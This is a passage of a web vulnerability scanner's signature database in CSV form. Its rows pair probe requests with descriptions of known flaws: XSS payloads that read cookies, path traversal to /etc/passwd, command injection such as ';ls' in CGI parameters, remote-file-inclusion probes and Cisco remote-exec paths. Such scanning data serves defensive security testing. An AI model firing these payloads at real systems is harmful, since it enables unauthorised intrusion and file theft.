messages. Default ID 'WebAdmin' with pass 'WebBoard'.\",\"\",\"\"\n\"001223\",\"25499\",\"4\",\"/affich.php?image=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"GPhotos index.php rep Variable XSS.\",\"\",\"\"\n\"001224\",\"25498\",\"4\",\"/diapo.php?rep=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"GPhotos index.php rep Variable XSS.\",\"\",\"\"\n\"001225\",\"25497\",\"4\",\"/index.php?rep=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"GPhotos index.php rep Variable XSS.\",\"\",\"\"\n\"001226\",\"376\",\"7\",\"@TOMCATADMINcontextAdmin/contextAdmin.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.\",\"\",\"\"\n\"001227\",\"700\",\"4\",\"/fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001228\",\"3954\",\"4\",\"/fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001229\",\"700\",\"4\",\"/fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001230\",\"3954\",\"4\",\"/fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001231\",\"568\",\"3\",\"/blahb.ida\",\"GET\",\"200\",\"\",\"\",\"file blahb\\.ida could not\",\"\",\"Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.\",\"\",\"\"\n\"001232\",\"568\",\"3\",\"/blahb.idq\",\"GET\",\"200\",\"\",\"\",\"file blahb\\.idq could not\",\"\",\"Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.\",\"\",\"\"\n\"001233\",\"19957\",\"a\",\"/ab2/\\@AdminViewError\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sun Answerbook allows viewing of the error logs without authentication.\",\"\",\"\"\n\"001236\",\"16014\",\"4\",\"/\\\"><img%20src=\\\"javascript:alert(document.domain)\\\">\",\"GET\",\"<img src=\\\"javascript:alert\\(document\\.domain\\)\\\">\",\"\",\"\",\"\",\"\",\"The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001237\",\"3233\",\"3\",\"/Survey/Survey.Htm\",\"GET\",\"System Components\",\"\",\"\",\"\",\"\",\"This Compaq device, without authentication, gives lots of system information.\",\"\",\"\"\n\"001238\",\"3233\",\"3\",\"/WEBAGENT/CQMGSERV/CF-SINFO.TPF\",\"GET\",\"General Information\",\"\",\"\",\"\",\"\",\"This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL\",\"\",\"\"\n\"001239\",\"8679\",\"a\",\"/ab2/\\@AdminAddadmin?uid=foo&password=bar&re_password=bar\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'.\",\"\",\"\"\n\"001240\",\"14633\",\"4\",\"/ab2/Help_C/\\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> \",\"GET\",\"<script>alert\\(Vulnerable\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sun Answerbook is vulnerable to XSS in the search field.\",\"\",\"\"\n\"001241\",\"19947\",\"4\",\"/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001243\",\"2117\",\"b\",\"/BACLIENT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"IBM Tivoli default file found.\",\"\",\"\"\n\"001244\",\"3233\",\"1b\",\"/postinfo.html\",\"GET\",\"Web Publishing Information\",\"\",\"\",\"\",\"\",\"Microsoft FrontPage default file found.\",\"\",\"\"\n\"001245\",\"30092\",\"3b\",\"/na_admin/ataglance.html\",\"GET\",\"Filer At\",\"\",\"\",\"\",\"\",\"NetApp application displays detailed system information.\",\"\",\"\"\n\"001246\",\"1210\",\"7\",\"/scripts/samples/search/qfullhit.htw\",\"GET\",\"QUERY\",\"\",\"\",\"\",\"\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. MS00-006.\",\"\",\"\"\n\"001247\",\"1210\",\"7\",\"/scripts/samples/search/qsumrhit.htw\",\"GET\",\"QUERY\",\"\",\"\",\"\",\"\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. MS00-006.\",\"\",\"\"\n\"001248\",\"1210\",\"7\",\"/JUNK(5).htw\",\"GET\",\"QUERY\",\"\",\"\",\"\",\"\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.\",\"\",\"\"\n#\"001251\",\"787\",\"28a\",\"http://127.0.0.1:2301/ HTTP/1.0\",\"GET\",\"Compaq WBEM Device\",\"\",\"\",\"\",\"\",\"The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html\",\"\",\"\"\n\"001252\",\"847\",\"37\",\"/file/../../../../../../../../etc/\",\"GET\",\"passwd\",\"\",\"hosts\",\"\",\"\",\"The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval.\",\"\",\"\"\n\"001253\",\"578\",\"8\",\"/level/16/exec/-///pwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001254\",\"578\",\"8\",\"/level/16/exec/-///show/configuration\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001255\",\"578\",\"8\",\"/level/16\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001256\",\"578\",\"8\",\"/level/16/exec/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001257\",\"578\",\"8\",\"/level/16/exec//show/access-lists\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001258\",\"578\",\"8\",\"/level/16/level/16/exec//show/configuration\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001259\",\"578\",\"8\",\"/level/16/level/16/exec//show/interfaces\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001260\",\"578\",\"8\",\"/level/16/level/16/exec//show/interfaces/status\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001261\",\"578\",\"8\",\"/level/16/level/16/exec//show/version\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001262\",\"578\",\"8\",\"/level/16/level/16/exec//show/running-config/interface/FastEthernet\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001263\",\"578\",\"8\",\"/level/16/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001264\",\"578\",\"8\",\"/level/17/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001265\",\"578\",\"8\",\"/level/18/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001266\",\"578\",\"8\",\"/level/19/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001267\",\"578\",\"8\",\"/level/20/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001268\",\"578\",\"8\",\"/level/21/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001269\",\"578\",\"8\",\"/level/22/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001270\",\"578\",\"8\",\"/level/23/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001271\",\"578\",\"8\",\"/level/24/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001272\",\"578\",\"8\",\"/level/25/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001273\",\"578\",\"8\",\"/level/26/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001274\",\"578\",\"8\",\"/level/27/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001275\",\"578\",\"8\",\"/level/28/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001276\",\"578\",\"8\",\"/level/29/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001277\",\"578\",\"8\",\"/level/30/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001278\",\"578\",\"8\",\"/level/31/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001279\",\"578\",\"8\",\"/level/32/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001280\",\"578\",\"8\",\"/level/33/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001281\",\"578\",\"8\",\"/level/34/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001282\",\"578\",\"8\",\"/level/35/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001283\",\"578\",\"8\",\"/level/36/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001284\",\"578\",\"8\",\"/level/37/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001285\",\"578\",\"8\",\"/level/38/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001286\",\"578\",\"8\",\"/level/39/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001287\",\"578\",\"8\",\"/level/40/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001288\",\"578\",\"8\",\"/level/41/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001289\",\"578\",\"8\",\"/level/42/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001290\",\"578\",\"8\",\"/level/43/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001291\",\"578\",\"8\",\"/level/44/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001292\",\"578\",\"8\",\"/level/45/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001293\",\"578\",\"8\",\"/level/46/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001294\",\"578\",\"8\",\"/level/47/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001295\",\"578\",\"8\",\"/level/48/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001296\",\"578\",\"8\",\"/level/49/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001297\",\"578\",\"8\",\"/level/50/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001298\",\"578\",\"8\",\"/level/51/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001299\",\"578\",\"8\",\"/level/52/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001300\",\"578\",\"8\",\"/level/53/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001301\",\"578\",\"8\",\"/level/54/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001302\",\"578\",\"8\",\"/level/55/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001303\",\"578\",\"8\",\"/level/56/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001304\",\"578\",\"8\",\"/level/57/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001305\",\"578\",\"8\",\"/level/58/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001306\",\"578\",\"8\",\"/level/59/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001307\",\"578\",\"8\",\"/level/60/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001308\",\"578\",\"8\",\"/level/61/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001309\",\"578\",\"8\",\"/level/62/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001310\",\"578\",\"8\",\"/level/63/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001311\",\"578\",\"8\",\"/level/64/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001312\",\"578\",\"8\",\"/level/65/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001313\",\"578\",\"8\",\"/level/66/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001314\",\"578\",\"8\",\"/level/67/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001315\",\"578\",\"8\",\"/level/68/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001316\",\"578\",\"8\",\"/level/69/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001317\",\"578\",\"8\",\"/level/70/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001318\",\"578\",\"8\",\"/level/71/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001319\",\"578\",\"8\",\"/level/72/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001320\",\"578\",\"8\",\"/level/73/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001321\",\"578\",\"8\",\"/level/74/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001322\",\"578\",\"8\",\"/level/75/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001323\",\"578\",\"8\",\"/level/76/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001324\",\"578\",\"8\",\"/level/77/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001325\",\"578\",\"8\",\"/level/78/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001326\",\"578\",\"8\",\"/level/79/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001327\",\"578\",\"8\",\"/level/80/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001328\",\"578\",\"8\",\"/level/81/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001329\",\"578\",\"8\",\"/level/82/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001330\",\"578\",\"8\",\"/level/83/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001331\",\"578\",\"8\",\"/level/84/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001332\",\"578\",\"8\",\"/level/85/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001333\",\"578\",\"8\",\"/level/86/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001334\",\"578\",\"8\",\"/level/87/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001335\",\"578\",\"8\",\"/level/88/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001336\",\"578\",\"8\",\"/level/89/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001337\",\"578\",\"8\",\"/level/90/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001338\",\"578\",\"8\",\"/level/91/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001339\",\"578\",\"8\",\"/level/92/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001340\",\"578\",\"8\",\"/level/93/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001341\",\"578\",\"8\",\"/level/94/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001342\",\"578\",\"8\",\"/level/95/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001343\",\"578\",\"8\",\"/level/96/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001344\",\"578\",\"8\",\"/level/97/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001345\",\"578\",\"8\",\"/level/98/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001346\",\"578\",\"8\",\"/level/99/exec//show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001347\",\"10359\",\"c\",\"/gallery/captionator.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001348\",\"10359\",\"c\",\"/gallery/errors/configmode.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001350\",\"10359\",\"c\",\"/gallery/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001351\",\"10359\",\"c\",\"/gallery/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001352\",\"18810\",\"3\",\"/users.lst\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"LocalWEB2000 users.lst passwords found\",\"\",\"\"\n\"001353\",\"13405\",\"23\",\"/WS_FTP.LOG\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WS_FTP.LOG file was found. It may contain sensitive information.\",\"\",\"\"\n\"001354\",\"8956\",\"7\",\"/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file retrieval.\",\"\",\"\"\n\"001355\",\"3720\",\"23\",\"/examples/jsp/snp/snoop.jsp\",\"GET\",\"Request Information\",\"\",\"\",\"\",\"\",\"Displays information about page retrievals, including other users.\",\"\",\"\"\n\"001356\",\"3715\",\"23\",\"/nsn/env.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell web server shows the server environment and is vulnerable to cross-site scripting\",\"\",\"\"\n\"001357\",\"3722\",\"23\",\"/lcgi/lcgitest.nlm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell web server shows the server environment\",\"\",\"\"\n\"001358\",\"13404\",\"2\",\"/com/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell web server allows directory listing\",\"\",\"\"\n\"001359\",\"13402\",\"2\",\"/com/novell/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell web server allows directory listing\",\"\",\"\"\n\"001360\",\"13403\",\"2\",\"/com/novell/webaccess\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Novell web server allows directory listing\",\"\",\"\"\n\"001361\",\"10944\",\"18\",\"@CGIDIRS\",\"GET\",\"match\",\"\",\"\",\"\",\"\",\"CGI Directory found\",\"\",\"\"\n\"001362\",\"8193\",\"7\",\"/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc\",\"GET\",\"passwd\",\"\",\"\",\"\",\"\",\"EW FileManager for PostNuke allows arbitrary file retrieval.\",\"\",\"\"\n\"001363\",\"8193\",\"7\",\"/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EW FileManager for PostNuke allows arbitrary file retrieval.\",\"\",\"\"\n\"001364\",\"3093\",\"1\",\"@CGIDIRSccbill-local.pl?cmd=MENU\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001365\",\"3093\",\"1\",\"@CGIDIRSccbill-local.cgi?cmd=MENU\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001366\",\"3093\",\"1\",\"@CGIDIRSmastergate/search.cgi?search=0&search_on=all\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001367\",\"3093\",\"1\",\"@CGIDIRSBackup/add-passwd.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001368\",\"13243\",\"8\",\"@CGIDIRSsendpage.pl?message=test\\;/bin/ls%20/etc;echo%20\\message\",\"GET\",\"passwd\",\"\",\"\",\"\",\"\",\"sendpage.pl allows command execution via the message variable.\",\"\",\"\"\n\"001369\",\"1642\",\"8\",\"@CGIDIRSgbook/gbook.cgi?_MAILTO=xx;ls\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"gbook.cgi allows command execution.\",\"\",\"\"\n\"001370\",\"7161\",\"8\",\"@CGIDIRSbslist.cgi?email=x;ls\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BSList allows command execution.\",\"\",\"\"\n\"001371\",\"7162\",\"8\",\"@CGIDIRSbsguest.cgi?email=x;ls\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BSGuest allows command execution.\",\"\",\"\"\n\"001372\",\"10902\",\"3\",\"@CGIDIRSnbmember.cgi?cmd=list_all_users\",\"GET\",\"OK: Listing\",\"\",\"\",\"\",\"\",\"Netbilling ndmember.cgi reveals sensitive information.\",\"\",\"\"\n\"001373\",\"4804\",\"a\",\"//admin/admin.shtml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Axis network camera may allow admin bypass by using double-slashes before URLs.\",\"\",\"\"\n\"001374\",\"4808\",\"70\",\"/axis-cgi/buffer/command.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Axis WebCam 2400 may allow overwriting or creating files on the system. See http://www.websec.org/adv/axis2400.txt.html for details.\",\"\",\"\"\n\"001375\",\"4806\",\"3\",\"/support/messages\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html\",\"\",\"\"\n\"001376\",\"3093\",\"8\",\"@CGIDIRSwhere.pl?sd=ls%20/etc\",\"GET\",\"passwd\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001377\",\"3268\",\"23\",\"@CGIDIRS\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting 